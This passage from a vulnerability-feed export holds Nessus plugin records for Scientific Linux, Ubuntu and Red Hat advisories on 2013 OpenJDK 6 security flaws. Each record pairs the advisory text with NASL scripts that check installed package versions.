application or applet could use these flaws\nto bypass Java sandbox restrictions. (CVE-2013-2431, CVE-2013-2421)\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the\nImageIO component did not protect against modification of their state\nwhile performing certain native code operations. An untrusted Java\napplication or applet could possibly use these flaws to trigger Java\nVirtual Machine memory corruption. (CVE-2013-2429, CVE-2013-2430)\n\nThe JDBC driver manager could incorrectly call the toString() method\nin JDBC drivers, and the ConcurrentHashMap class could incorrectly\ncall the defaultReadObject() method. An untrusted Java application or\napplet could possibly use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-1488, CVE-2013-2426)\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may\nincorrectly invoke the system class loader. An untrusted Java\napplication or applet could possibly use this flaw to bypass certain\nJava sandbox restrictions. (CVE-2013-0401)\n\nFlaws were discovered in the Network component", "modified": "2019-11-02T00:00:00", "id": "SL_20130424_JAVA_1_6_0_OPENJDK_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/66228", "published": "2013-04-26T00:00:00", "title": "Scientific Linux Security Update : java-1.6.0-openjdk on SL5.x, SL6.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66228);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/07/11 12:05:37\");\n\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\", \"CVE-2013-1557\", \"CVE-2013-1558\", \"CVE-2013-1569\", \"CVE-2013-2383\", \"CVE-2013-2384\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2419\", \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\", \"CVE-2013-2424\", \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\");\n\n script_name(english:\"Scientific Linux Security Update : java-1.6.0-openjdk on SL5.x, SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws were discovered in the font layout engine in the 2D\ncomponent. An untrusted Java application or applet could possibly use\nthese flaws to trigger Java Virtual Machine memory corruption.\n(CVE-2013-1569, CVE-2013-2383, CVE-2013-2384)\n\nMultiple improper permission check issues were discovered in the\nBeans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted\nJava application or applet could use these flaws to bypass Java\nsandbox restrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-1518,\nCVE-2013-1557)\n\nThe previous default value of the java.rmi.server.useCodebaseOnly\nproperty permitted the RMI implementation to automatically load\nclasses from remotely specified locations. An attacker able to connect\nto an application using RMI could use this flaw to make the\napplication execute arbitrary code. (CVE-2013-1537)\n\nNote: The fix for CVE-2013-1537 changes the default value of the\nproperty to true, restricting class loading to the local CLASSPATH and\nlocations specified in the java.rmi.server.codebase property. Refer to\nRed Hat Bugzilla bug 952387 for additional details.\n\nThe 2D component did not properly process certain images. An untrusted\nJava application or applet could possibly use this flaw to trigger\nJava Virtual Machine memory corruption. (CVE-2013-2420)\n\nIt was discovered that the Hotspot component did not properly handle\ncertain intrinsic frames, and did not correctly perform MethodHandle\nlookups. An untrusted Java application or applet could use these flaws\nto bypass Java sandbox restrictions. (CVE-2013-2431, CVE-2013-2421)\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the\nImageIO component did not protect against modification of their state\nwhile performing certain native code operations. An untrusted Java\napplication or applet could possibly use these flaws to trigger Java\nVirtual Machine memory corruption. (CVE-2013-2429, CVE-2013-2430)\n\nThe JDBC driver manager could incorrectly call the toString() method\nin JDBC drivers, and the ConcurrentHashMap class could incorrectly\ncall the defaultReadObject() method. An untrusted Java application or\napplet could possibly use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-1488, CVE-2013-2426)\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may\nincorrectly invoke the system class loader. An untrusted Java\napplication or applet could possibly use this flaw to bypass certain\nJava sandbox restrictions. (CVE-2013-0401)\n\nFlaws were discovered in the Network component's InetAddress\nserialization, and the 2D component's font handling. An untrusted Java\napplication or applet could possibly use these flaws to crash the Java\nVirtual Machine. (CVE-2013-2417, CVE-2013-2419)\n\nThe MBeanInstantiator class implementation in the OpenJDK JMX\ncomponent did not properly check class access before creating new\ninstances. An untrusted Java application or applet could use this flaw\nto create instances of non-public classes. (CVE-2013-2424)\n\nIt was discovered that JAX-WS could possibly create temporary files\nwith insecure permissions. A local attacker could use this flaw to\naccess temporary files created by an application using JAX-WS.\n(CVE-2013-2415)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.11.10.\n\nAll running instances of OpenJDK Java must be restarted for the update\nto take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1304&L=scientific-linux-errata&T=0&P=2465\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b6864e37\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet Driver Manager Privileged toString() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:30:44", "bulletinFamily": "scanner", "description": "Ben Murphy discovered a vulnerability in the OpenJDK JRE related to\ninformation disclosure and data integrity. An attacker could exploit\nthis to execute arbitrary code. (CVE-2013-0401)\n\nJames Forshaw discovered a vulnerability in the OpenJDK JRE related to\ninformation disclosure, data integrity and availability. An attacker\ncould exploit this to execute arbitrary code. (CVE-2013-1488)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to\ninformation disclosure, data integrity and availability. An attacker\ncould exploit these to cause a denial of service or expose sensitive\ndata over the network. (CVE-2013-1518, CVE-2013-1537, CVE-2013-1557,\nCVE-2013-1558, CVE-2013-1569, CVE-2013-2383, CVE-2013-2384,\nCVE-2013-2420, CVE-2013-2421, CVE-2013-2422, CVE-2013-2426,\nCVE-2013-2429, CVE-2013-2430, CVE-2013-2431, CVE-2013-2436)\n\nTwo vulnerabilities were discovered in the OpenJDK JRE related to\nconfidentiality. An attacker could exploit these to expose sensitive\ndata over the network. (CVE-2013-2415, CVE-2013-2424)\n\nTwo vulnerabilities were discovered in the OpenJDK JRE related to\navailability. An attacker could exploit these to cause a denial of\nservice. (CVE-2013-2417, CVE-2013-2419).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-1819-1.NASL", "href": "https://www.tenable.com/plugins/nessus/66348", "published": "2013-05-08T00:00:00", "title": "Ubuntu 10.04 LTS / 11.10 / 12.04 LTS : openjdk-6 vulnerabilities (USN-1819-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1819-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66348);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\", \"CVE-2013-1557\", \"CVE-2013-1558\", \"CVE-2013-1569\", \"CVE-2013-2383\", \"CVE-2013-2384\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2419\", \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\", \"CVE-2013-2424\", \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\", \"CVE-2013-2436\");\n script_bugtraq_id(58504, 58507, 59131, 59141, 59153, 59165, 59166, 59167, 59170, 59179, 59184, 59187, 59190, 59194, 59206, 59212, 59219, 59228, 59243);\n script_xref(name:\"USN\", value:\"1819-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 11.10 / 12.04 LTS : openjdk-6 vulnerabilities (USN-1819-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Murphy discovered a vulnerability in the OpenJDK JRE related to\ninformation disclosure and data integrity. An attacker could exploit\nthis to execute arbitrary code. (CVE-2013-0401)\n\nJames Forshaw discovered a vulnerability in the OpenJDK JRE related to\ninformation disclosure, data integrity and availability. An attacker\ncould exploit this to execute arbitrary code. (CVE-2013-1488)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to\ninformation disclosure, data integrity and availability. An attacker\ncould exploit these to cause a denial of service or expose sensitive\ndata over the network. (CVE-2013-1518, CVE-2013-1537, CVE-2013-1557,\nCVE-2013-1558, CVE-2013-1569, CVE-2013-2383, CVE-2013-2384,\nCVE-2013-2420, CVE-2013-2421, CVE-2013-2422, CVE-2013-2426,\nCVE-2013-2429, CVE-2013-2430, CVE-2013-2431, CVE-2013-2436)\n\nTwo vulnerabilities were discovered in the OpenJDK JRE related to\nconfidentiality. An attacker could exploit these to expose sensitive\ndata over the network. (CVE-2013-2415, CVE-2013-2424)\n\nTwo vulnerabilities were discovered in the OpenJDK JRE related to\navailability. An attacker could exploit these to cause a denial of\nservice. (CVE-2013-2417, CVE-2013-2419).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1819-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet Driver Manager Privileged toString() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:icedtea-6-jre-cacao\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:icedtea-6-jre-jamvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-zero\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|11\\.10|12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 11.10 / 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"icedtea-6-jre-cacao\", pkgver:\"6b27-1.12.5-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"openjdk-6-jre\", pkgver:\"6b27-1.12.5-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"openjdk-6-jre-headless\", pkgver:\"6b27-1.12.5-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"openjdk-6-jre-lib\", pkgver:\"6b27-1.12.5-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"openjdk-6-jre-zero\", pkgver:\"6b27-1.12.5-0ubuntu0.10.04.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"icedtea-6-jre-cacao\", pkgver:\"6b27-1.12.5-0ubuntu0.11.10.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"icedtea-6-jre-jamvm\", pkgver:\"6b27-1.12.5-0ubuntu0.11.10.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"openjdk-6-jre\", pkgver:\"6b27-1.12.5-0ubuntu0.11.10.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"openjdk-6-jre-headless\", pkgver:\"6b27-1.12.5-0ubuntu0.11.10.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"openjdk-6-jre-lib\", pkgver:\"6b27-1.12.5-0ubuntu0.11.10.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"openjdk-6-jre-zero\", pkgver:\"6b27-1.12.5-0ubuntu0.11.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"icedtea-6-jre-cacao\", pkgver:\"6b27-1.12.5-0ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"icedtea-6-jre-jamvm\", pkgver:\"6b27-1.12.5-0ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"openjdk-6-jre\", pkgver:\"6b27-1.12.5-0ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"openjdk-6-jre-headless\", pkgver:\"6b27-1.12.5-0ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"openjdk-6-jre-lib\", pkgver:\"6b27-1.12.5-0ubuntu0.12.04.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"openjdk-6-jre-zero\", pkgver:\"6b27-1.12.5-0ubuntu0.12.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"icedtea-6-jre-cacao / icedtea-6-jre-jamvm / openjdk-6-jre / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:20:43", "bulletinFamily": "scanner", "description": "Updated java-1.6.0-openjdk packages that fix various security issues\nare now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nMultiple flaws were discovered in the font layout engine in the 2D\ncomponent. An untrusted Java application or applet could possibly use\nthese flaws to trigger Java Virtual Machine memory corruption.\n(CVE-2013-1569, CVE-2013-2383, CVE-2013-2384)\n\nMultiple improper permission check issues were discovered in the\nBeans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted\nJava application or applet could use these flaws to bypass Java\nsandbox restrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-1518,\nCVE-2013-1557)\n\nThe previous default value of the java.rmi.server.useCodebaseOnly\nproperty permitted the RMI implementation to automatically load\nclasses from remotely specified locations. An attacker able to connect\nto an application using RMI could use this flaw to make the\napplication execute arbitrary code. (CVE-2013-1537)\n\nNote: The fix for CVE-2013-1537 changes the default value of the\nproperty to true, restricting class loading to the local CLASSPATH and\nlocations specified in the java.rmi.server.codebase property. Refer to\nRed Hat Bugzilla bug 952387 for additional details.\n\nThe 2D component did not properly process certain images. An untrusted\nJava application or applet could possibly use this flaw to trigger\nJava Virtual Machine memory corruption. (CVE-2013-2420)\n\nIt was discovered that the Hotspot component did not properly handle\ncertain intrinsic frames, and did not correctly perform MethodHandle\nlookups. An untrusted Java application or applet could use these flaws\nto bypass Java sandbox restrictions. (CVE-2013-2431, CVE-2013-2421)\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the\nImageIO component did not protect against modification of their state\nwhile performing certain native code operations. An untrusted Java\napplication or applet could possibly use these flaws to trigger Java\nVirtual Machine memory corruption. (CVE-2013-2429, CVE-2013-2430)\n\nThe JDBC driver manager could incorrectly call the toString() method\nin JDBC drivers, and the ConcurrentHashMap class could incorrectly\ncall the defaultReadObject() method. An untrusted Java application or\napplet could possibly use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-1488, CVE-2013-2426)\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may\nincorrectly invoke the system class loader. An untrusted Java\napplication or applet could possibly use this flaw to bypass certain\nJava sandbox restrictions. (CVE-2013-0401)\n\nFlaws were discovered in the Network component", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2013-0770.NASL", "href": "https://www.tenable.com/plugins/nessus/66212", "published": "2013-04-25T00:00:00", "title": "RHEL 5 / 6 : java-1.6.0-openjdk (RHSA-2013:0770)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0770. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66212);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2019/10/24 15:35:37\");\n\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\", \"CVE-2013-1557\", \"CVE-2013-1558\", \"CVE-2013-1569\", \"CVE-2013-2383\", \"CVE-2013-2384\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2419\", \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\", \"CVE-2013-2424\", \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\");\n script_bugtraq_id(58504, 58507, 59131, 59141, 59153, 59159, 59165, 59166, 59167, 59170, 59179, 59184, 59187, 59190, 59194, 59206, 59212, 59219, 59228, 59243);\n script_xref(name:\"RHSA\", value:\"2013:0770\");\n\n script_name(english:\"RHEL 5 / 6 : java-1.6.0-openjdk (RHSA-2013:0770)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.6.0-openjdk packages that fix various security issues\nare now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 6 Java Runtime Environment and the\nOpenJDK 6 Software Development Kit.\n\nMultiple flaws were discovered in the font layout engine in the 2D\ncomponent. An untrusted Java application or applet could possibly use\nthese flaws to trigger Java Virtual Machine memory corruption.\n(CVE-2013-1569, CVE-2013-2383, CVE-2013-2384)\n\nMultiple improper permission check issues were discovered in the\nBeans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted\nJava application or applet could use these flaws to bypass Java\nsandbox restrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-1518,\nCVE-2013-1557)\n\nThe previous default value of the java.rmi.server.useCodebaseOnly\nproperty permitted the RMI implementation to automatically load\nclasses from remotely specified locations. An attacker able to connect\nto an application using RMI could use this flaw to make the\napplication execute arbitrary code. (CVE-2013-1537)\n\nNote: The fix for CVE-2013-1537 changes the default value of the\nproperty to true, restricting class loading to the local CLASSPATH and\nlocations specified in the java.rmi.server.codebase property. Refer to\nRed Hat Bugzilla bug 952387 for additional details.\n\nThe 2D component did not properly process certain images. An untrusted\nJava application or applet could possibly use this flaw to trigger\nJava Virtual Machine memory corruption. (CVE-2013-2420)\n\nIt was discovered that the Hotspot component did not properly handle\ncertain intrinsic frames, and did not correctly perform MethodHandle\nlookups. An untrusted Java application or applet could use these flaws\nto bypass Java sandbox restrictions. (CVE-2013-2431, CVE-2013-2421)\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the\nImageIO component did not protect against modification of their state\nwhile performing certain native code operations. An untrusted Java\napplication or applet could possibly use these flaws to trigger Java\nVirtual Machine memory corruption. (CVE-2013-2429, CVE-2013-2430)\n\nThe JDBC driver manager could incorrectly call the toString() method\nin JDBC drivers, and the ConcurrentHashMap class could incorrectly\ncall the defaultReadObject() method. An untrusted Java application or\napplet could possibly use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-1488, CVE-2013-2426)\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may\nincorrectly invoke the system class loader. An untrusted Java\napplication or applet could possibly use this flaw to bypass certain\nJava sandbox restrictions. (CVE-2013-0401)\n\nFlaws were discovered in the Network component's InetAddress\nserialization, and the 2D component's font handling. An untrusted Java\napplication or applet could possibly use these flaws to crash the Java\nVirtual Machine. (CVE-2013-2417, CVE-2013-2419)\n\nThe MBeanInstantiator class implementation in the OpenJDK JMX\ncomponent did not properly check class access before creating new\ninstances. An untrusted Java application or applet could use this flaw\nto create instances of non-public classes. (CVE-2013-2424)\n\nIt was discovered that JAX-WS could possibly create temporary files\nwith insecure permissions. A local attacker could use this flaw to\naccess temporary files created by an application using JAX-WS.\n(CVE-2013-2415)\n\nThis erratum also upgrades the OpenJDK package to IcedTea6 1.11.10.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n # http://icedtea.classpath.org/hg/release/icedtea6-1.11/file/icedtea6-1.11.10\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ab823eca\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0770\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1518\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2415\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2430\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2431\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1488\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1569\"\n 